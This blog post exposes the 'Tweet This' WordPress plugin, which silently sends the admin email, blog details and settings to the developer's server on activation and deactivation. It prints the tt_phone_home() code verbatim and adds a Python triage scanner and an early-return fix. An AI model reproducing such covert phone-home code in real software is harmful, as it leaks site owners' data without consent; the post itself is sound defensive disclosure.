Before installing any WordPress plugin I always examine the plugin source code for security reasons, which is not a problem for me given my ten years of developing in PHP. However, I don't expect the usual WordPress user to have this kind of knowledge; most of them don't have any experience with PHP at all.
Thus, when I was reading the source code of the Tweet This plugin, I was shocked to see that on both activation and deactivation the plugin automatically transfers the following information to the developer's website:
- domain of your site and URL of your blog
- Tweet This version
- status (activated, deactivated)
- number of posts in your blog
- title of your blog
- description of your blog
- language of your blog
- your email address
- Tweet This plugin settings
- WordPress version
This is the code snippet, taken directly from the plugin source (no, I didn't add the "Big brother" comment there; that's how it's written in the code):
// Big brother is watching.
function tt_phone_home($status) {
    global $current_site;
    global $wpdb;
    $wpv = get_bloginfo('version');
    $siteURL = $current_site->domain;
    $blogURL = get_bloginfo('url');
    $title = get_bloginfo('name');
    $email = get_bloginfo('admin_email');
    $description = get_bloginfo('description');
    $lang = get_bloginfo('language');
    $posts = number_format($wpdb->get_var("SELECT COUNT(*)
        FROM $wpdb->posts WHERE post_status = 'publish'"));
    $settings = $wpdb->get_var("SELECT option_value
        FROM $wpdb->options WHERE option_name = 'tweet_this_settings'");
    $phone = tt_read_file('http://th8.us/ttph.php?s=' . $siteURL . '&b=' .
        $blogURL . '&v=1.3.9&u=' . $status . '&p=' . $posts . '&t=' .
        urlencode($title) . '&d=' . urlencode($description) . '&l=' .
        urlencode($lang) . '&e=' . urlencode($email) . '&w=' . $wpv .
        '&x=' . urlencode($settings));
}
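Reading every plugin file by hand is exactly what most users cannot do, so here is an added example (not code from the original post, nor from the Tweet This plugin) of how to triage a plugin for this kind of behaviour mechanically: a small Python script that scans PHP source for hard-coded outbound URLs, the function each URL is passed to, well-known HTTP functions, the get_bloginfo() fields the code reads, and the query-string parameters it assembles. It runs over a constructed copy of the tt_phone_home() function quoted above, embedded as a string; the helper names, the list of HTTP functions and the "sensitive fields" set are my own choices, not anything defined by WordPress.

```python
"""Static triage of WordPress plugin source for phone-home behaviour.

Added example, not code from the original post or the Tweet This plugin.
"""
import re
from pathlib import Path

# Constructed sample: the tt_phone_home() function quoted above, as a string.
SAMPLE_PLUGIN_SOURCE = r"""<?php
// Big brother is watching.
function tt_phone_home($status) {
    global $current_site;
    global $wpdb;
    $wpv = get_bloginfo('version');
    $siteURL = $current_site->domain;
    $blogURL = get_bloginfo('url');
    $title = get_bloginfo('name');
    $email = get_bloginfo('admin_email');
    $description = get_bloginfo('description');
    $lang = get_bloginfo('language');
    $posts = number_format($wpdb->get_var("SELECT COUNT(*)
        FROM $wpdb->posts WHERE post_status = 'publish'"));
    $settings = $wpdb->get_var("SELECT option_value
        FROM $wpdb->options WHERE option_name = 'tweet_this_settings'");
    $phone = tt_read_file('http://th8.us/ttph.php?s=' . $siteURL . '&b=' .
        $blogURL . '&v=1.3.9&u=' . $status . '&p=' . $posts . '&t=' .
        urlencode($title) . '&d=' . urlencode($description) . '&l=' .
        urlencode($lang) . '&e=' . urlencode($email) . '&w=' . $wpv .
        '&x=' . urlencode($settings));
}
"""

# Well-known PHP / WordPress functions that open outbound connections.
# A plugin may hide the call behind its own wrapper (tt_read_file here),
# which is why the URL-literal scan below is the more reliable signal.
HTTP_FUNCTIONS = (
    "file_get_contents", "fopen", "fsockopen", "curl_init", "curl_exec",
    "wp_remote_get", "wp_remote_post", "wp_remote_request",
)
# Site data that identifies the installation or its owner (my own selection).
SENSITIVE_FIELDS = {"admin_email", "url", "name", "description", "language", "version"}

URL_LITERAL = re.compile(r"""['"](https?://[^'"\s?]+)""")
URL_CALLER = re.compile(r"""(\w+)\s*\(\s*['"]https?://""")
BLOGINFO = re.compile(r"""get_bloginfo\(\s*['"]([a-z_]+)['"]\s*\)""")
QUERY_PARAM = re.compile(r"[?&]([A-Za-z_][A-Za-z0-9_]*)=")


def find_urls(src):
    """Hard-coded http(s) URLs, without their query string."""
    return sorted(set(URL_LITERAL.findall(src)))


def find_url_callers(src):
    """Names of functions called with a URL literal as first argument."""
    return sorted(set(URL_CALLER.findall(src)))


def find_http_functions(src):
    """Known HTTP-capable functions that appear to be called."""
    return sorted(name for name in HTTP_FUNCTIONS
                  if re.search(r"\b" + re.escape(name) + r"\s*\(", src))


def find_bloginfo_fields(src):
    """get_bloginfo() fields the code reads."""
    return sorted(set(BLOGINFO.findall(src)))


def find_query_params(src):
    """Query-string parameter names assembled anywhere in the source."""
    return sorted(set(QUERY_PARAM.findall(src)))


def triage(src):
    """Summarise outbound-call indicators for one PHP source string."""
    urls = find_urls(src)
    fields = find_bloginfo_fields(src)
    return {
        "urls": urls,
        "url_callers": find_url_callers(src),
        "http_functions": find_http_functions(src),
        "bloginfo_fields": fields,
        "query_params": find_query_params(src),
        # Flag: a hard-coded remote URL next to identifying site data.
        "suspicious": bool(urls) and bool(SENSITIVE_FIELDS.intersection(fields)),
    }


def triage_plugin_dir(root):
    """Triage every .php file below root; keep files with outbound indicators."""
    reports = {}
    for path in Path(root).rglob("*.php"):
        report = triage(path.read_text(encoding="utf-8", errors="replace"))
        if report["urls"] or report["http_functions"]:
            reports[str(path)] = report
    return reports


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PLUGIN_SOURCE).items():
        print(f"{key}: {value}")
```

Run triage_plugin_dir() against the unpacked plugin directory before activating it. On the sample above the known-HTTP-function scan finds nothing, because the plugin wraps the request in its own tt_read_file() helper; the hard-coded URL, the admin_email field and the eleven query parameters are what give it away, so a grep for curl or file_get_contents alone is not enough.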
So, if you don't want all this information transferred to the developer, add a "return;" as the first statement of the function before you activate the plugin, leaving the rest untouched. Bear in mind that this is a hand edit to a file under wp-content/plugins: a plugin update overwrites it and the call fires again on the next activation or deactivation, so repeat the check after every update (or block outbound connections from the web server to th8.us at the firewall).
function tt_phone_home($status) {
    return;
That way the function returns right away and never calls any URL at all. I'm not saying that the developer is doing anything harmful with that plugin, yet I don't see any reason for transferring this information to his server.